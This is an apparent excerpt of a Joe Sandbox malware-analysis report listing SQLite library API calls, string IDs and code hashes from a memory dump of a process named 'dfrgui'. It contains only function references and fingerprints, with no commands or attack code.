                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                              • String ID:
                                                                                              • API String ID: 2838836587-0
                                                                                              • Opcode ID: 7a1af8179303211107d89f16b87f953ec3da3de4a159af8c9c71f8942b00b500
                                                                                              • Instruction ID: e7e2d8419c0fd305c4ca8e5831b7174966073de055ad9435788a944697c27d6f
                                                                                              • Opcode Fuzzy Hash: 7a1af8179303211107d89f16b87f953ec3da3de4a159af8c9c71f8942b00b500
                                                                                              • Instruction Fuzzy Hash: BF5183B5A047599FCB00DFA9C48469EBBF0BF88324F10C92AE858AB344D734E945CF51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2264764126-0
                                                                                              • Opcode ID: d058a993af42cb86fea1a59e7da52d3455e748a7fe53b1c3e3552f745b78ea45
                                                                                              • Instruction ID: 2bc8c59c20b8d22348804299da9c5a1c24a6c61704392f4113c65ddbd9dc0220
                                                                                              • Opcode Fuzzy Hash: d058a993af42cb86fea1a59e7da52d3455e748a7fe53b1c3e3552f745b78ea45
                                                                                              • Instruction Fuzzy Hash: AC319071E046568FDB049FB9C4A16ADBFF0AF9D314F24C469E8A9AB300D735E842CB51
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DE50
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3DE7F
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3DEA4
                                                                                                • Part of subcall function 61E3D74F: sqlite3_mprintf.SQLITE3 ref: 61E3D764
                                                                                                • Part of subcall function 61E3D74F: sqlite3_result_error.SQLITE3 ref: 61E3D77A
                                                                                                • Part of subcall function 61E3D74F: sqlite3_free.SQLITE3 ref: 61E3D782
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                              • String ID: insert$set
                                                                                              • API String ID: 832408550-3711289001
                                                                                              • Opcode ID: 22ec8db78650d714ea153c20f8bb89faedf6b494268b674d19264ca8e54fe863
                                                                                              • Instruction ID: b9c3dc24dbb6817829647f4c551625551972ac0dfb1156bc8e73c09a67f4bc36
                                                                                              • Opcode Fuzzy Hash: 22ec8db78650d714ea153c20f8bb89faedf6b494268b674d19264ca8e54fe863
                                                                                              • Instruction Fuzzy Hash: 9F317A78E042A89BCB01DFA9C484AADBBF5BFC4318F65C419E8948B310DB34E845CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E38054
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E380B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_error
                                                                                              • String ID: J
                                                                                              • API String ID: 497837271-1141589763
                                                                                              • Opcode ID: 776c6b12fb92b453155899d7e7b4b63c15b2a233bbd98b9ae10a4f187657ade1
                                                                                              • Instruction ID: d5ab37abe87de12d08c4c65baee3c62806a24f3b398c886ddf247d612400a361
                                                                                              • Opcode Fuzzy Hash: 776c6b12fb92b453155899d7e7b4b63c15b2a233bbd98b9ae10a4f187657ade1
                                                                                              • Instruction Fuzzy Hash: FA318234B04396DBD710AF78C884B5DBBA0AFC5318F20CA2CE8998B345C735E946CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E379A4
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E379AE
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E379D8
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E379E3
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E37A23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                              • String ID: null
                                                                                              • API String ID: 1955785328-634125391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E253DF: sqlite3_log.SQLITE3(?,?,?,?,?,61E25492), ref: 61E2541A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E29A51
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E29A65
                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E29A93
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E29AA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID: bad parameter or other API misuse$out of memory
                                                                                              • API String ID: 3568942437-948784999
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • strcmp.MSVCRT ref: 61E40359
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E40391
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403AA
                                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403E1
                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E403FA
                                                                                              • sqlite3_free.SQLITE3 ref: 61E4040D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                              • String ID:
                                                                                              • API String ID: 2202632817-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                              • String ID:
                                                                                              • API String ID: 2585109301-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3D16D
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D2B9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3D2C1
                                                                                                • Part of subcall function 61E39581: sqlite3_free.SQLITE3 ref: 61E39590
                                                                                                • Part of subcall function 61E39581: sqlite3_vmprintf.SQLITE3 ref: 61E395A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2044204354-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E366E8
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • memcmp.MSVCRT ref: 61E3675A
                                                                                              • memcmp.MSVCRT ref: 61E3677F
                                                                                              • memcmp.MSVCRT ref: 61E367A9
                                                                                              • memcmp.MSVCRT ref: 61E367D8
                                                                                              • memcmp.MSVCRT ref: 61E36804
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 40721531-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E261E9
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26217
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E26245
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26264
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E26272
                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E262A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                              • String ID:
                                                                                              • API String ID: 4226599549-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B37F
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B3AE
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B3C3
                                                                                              • sqlite3_load_extension.SQLITE3 ref: 61E3B3DE
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B3F9
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B404
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                              • String ID:
                                                                                              • API String ID: 356667613-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strglob
                                                                                              • String ID: $
                                                                                              • API String ID: 476814121-227171996
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E199B4
                                                                                                • Part of subcall function 61E19649: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E192D3,?,?,?,?,?,?,00000000,?,?,?,61E1D169), ref: 61E19651
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E199FC
                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19A23
                                                                                              • sqlite3_free.SQLITE3 ref: 61E19A51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                              • String ID: ra
                                                                                              • API String ID: 2308590742-515669570
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: __dllonexit_lock_onexit_unlock
                                                                                              • String ID: ti
                                                                                              • API String ID: 209411981-2601316754
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B569
                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B576
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B5A6
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B5BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_value_text$sqlite3_initializesqlite3_mprintfsqlite3_result_errorsqlite3_vmprintf
                                                                                              • String ID: after rename
                                                                                              • API String ID: 473106834-392022782
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B22E
                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1B2CE
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B1F5
                                                                                                • Part of subcall function 61E0A119: sqlite3_mutex_enter.SQLITE3 ref: 61E0A138
                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B45D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
                                                                                              • String ID:
                                                                                              • API String ID: 3222813361-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_strnicmp
                                                                                              • String ID:
                                                                                              • API String ID: 1961171630-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49B1E
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49CAB
                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E49DA0), ref: 61E49CBD
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49CD4
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49CDC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                              • String ID:
                                                                                              • API String ID: 2921195555-0
                                                                                              • Opcode ID: d19dedab9cb5e6f11c54e1e51d91f6ae964ce5efce376d1f248536dfd4b7238e
                                                                                              • Instruction ID: 792a80c48487ec52687e807984b257154e637deec0cdc0557b6d80cb6cd94670
                                                                                              • Opcode Fuzzy Hash: d19dedab9cb5e6f11c54e1e51d91f6ae964ce5efce376d1f248536dfd4b7238e
                                                                                              • Instruction Fuzzy Hash: A6518C70A046028BDB10DF69D9C0649B7B0FF88318F25C96CDC99AF305C738E852CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                              • String ID:
                                                                                              • API String ID: 4073198082-0
                                                                                              • Opcode ID: d6c22134a046c69aa067e8e4f4371d3fe0c75385b646ee908d42d66d9be81af1
                                                                                              • Instruction ID: 8fa6be03c7dba9889ae9520060d40073695be672e9dd452269ac1d368761de8d
                                                                                              • Opcode Fuzzy Hash: d6c22134a046c69aa067e8e4f4371d3fe0c75385b646ee908d42d66d9be81af1
                                                                                              • Instruction Fuzzy Hash: 424136B1A04625DFDB04CF64D48465ABBE2FF88314F24C469EC5A8F385E734E851CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_result_null.SQLITE3 ref: 61E37D89
                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E37DA8
                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E37E5D
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E37E91
                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E37ECE
                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                              • String ID:
                                                                                              • API String ID: 402655203-0
                                                                                              • Opcode ID: 409e3fb8d297a66fef37320e8562a33fe7adda16b435449ee7870a634a7c3f30
                                                                                              • Instruction ID: 09ddba835bcf15fbde6aa1b2efeba233e6b5c616b17edc70f301b9b60d68e0d7
                                                                                              • Opcode Fuzzy Hash: 409e3fb8d297a66fef37320e8562a33fe7adda16b435449ee7870a634a7c3f30
                                                                                              • Instruction Fuzzy Hash: 0D416A70D092A5DEDB109FADC194AADBBF1ABC9358F25C41EE4849B341C735D881DB22
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 61E13FAA: sqlite3_mutex_try.SQLITE3(?,?,?,61E1402A), ref: 61E13F4A
                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E49A47
                                                                                              • sqlite3_mutex_free.SQLITE3 ref: 61E49A88
                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E49A98
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49AC7
                                                                                              • sqlite3_free.SQLITE3 ref: 61E49AE6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                              • String ID:
                                                                                              • API String ID: 1894464702-0
                                                                                              • Opcode ID: 6112742a624d4eaa717f268fcb4be937bb7e56b8546d4e67576ec64d333ddfe2
                                                                                              • Instruction ID: 5b27ad18fcb023b1d1ff9fd32e39f905edc900126d4f03650a5b99fe2b41fa34
                                                                                              • Opcode Fuzzy Hash: 6112742a624d4eaa717f268fcb4be937bb7e56b8546d4e67576ec64d333ddfe2
                                                                                              • Instruction Fuzzy Hash: B3313B34B046428BEB14DFAAD5C0A1A7BF6BFC9348B29C469D8449B315E734E8819B81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3B602
                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B69E
                                                                                                • Part of subcall function 61E395AF: sqlite3_initialize.SQLITE3 ref: 61E395B5
                                                                                                • Part of subcall function 61E395AF: sqlite3_vmprintf.SQLITE3 ref: 61E395CF
                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3B6AC
                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B6CE
                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E3B6E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848195774.0000000061EAF000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848199606.0000000061EB2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848204998.0000000061EB5000.00000008.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848208605.0000000061EB6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                                                                              Similarity
                                                                                              • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_intsqlite3_vmprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1587739625-0
                                                                                              • Opcode ID: d762e509f5cb1270798c3d8b0ed4d09417eb475e6e46246839d711bae6bfec28
                                                                                              • Instruction ID: 05412b70bd6f85b6680fb51a4016b66afa1f036956eca5f0188ea7ea7b92be12
                                                                                              • Opcode Fuzzy Hash: d762e509f5cb1270798c3d8b0ed4d09417eb475e6e46246839d711bae6bfec28
                                                                                              • Instruction Fuzzy Hash: 7131E6B0E09A66DBCB016F95C94069D7BB0FFC5348F25C419D48297346E735C891DB82
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • sqlite3_log.SQLITE3 ref: 61E25519
                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E2552D
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E25555
                                                                                              • sqlite3_log.SQLITE3 ref: 61E25573
                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E25634), ref: 61E255A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.848159408.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                                                              • Associated: 00000008.00000002.848155630.0000000061E00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848181965.0000000061E99000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848186627.0000000061E9B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.848192015.0000000061EAE000.00000004.00000001.01000000.0000000A.sdmp
